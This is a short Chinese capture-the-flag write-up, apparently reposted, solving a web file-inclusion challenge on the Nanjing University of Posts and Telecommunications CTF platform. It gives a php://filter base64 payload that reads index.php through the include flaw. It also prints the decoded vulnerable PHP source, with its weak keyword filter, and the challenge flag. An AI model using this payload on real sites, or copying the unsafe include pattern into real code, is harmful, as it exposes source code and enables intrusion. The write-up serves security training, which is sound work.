首页 > Web开发 > 详细

南京邮电CTF平台做题writeup--web--文件包含

时间:2016-10-09 07:09:08      阅读:519      评论:0      收藏:0      [点我收藏+]

 

技术分享

明显的文件包含漏洞的格式网址,通过php://filter读取index源码-->php://filter/read=convert.base64-encode/resource=index.php
如下


再进行base64解码即可

<html>
    <title>asdf</title>
    
<?php
  error_reporting(0);
  if(!$_GET[file]){echo ‘<a href="./index.php?file=show.php">click me? no</a>‘;}
  $file=$_GET[‘file‘];
  if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";
    exit();
  }
  include($file); 
//flag:nctf{edulcni_elif_lacol_si_siht}

?>
</html>

 

南京邮电CTF平台做题writeup--web--文件包含

原文:http://www.cnblogs.com/vincebye/p/5940699.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!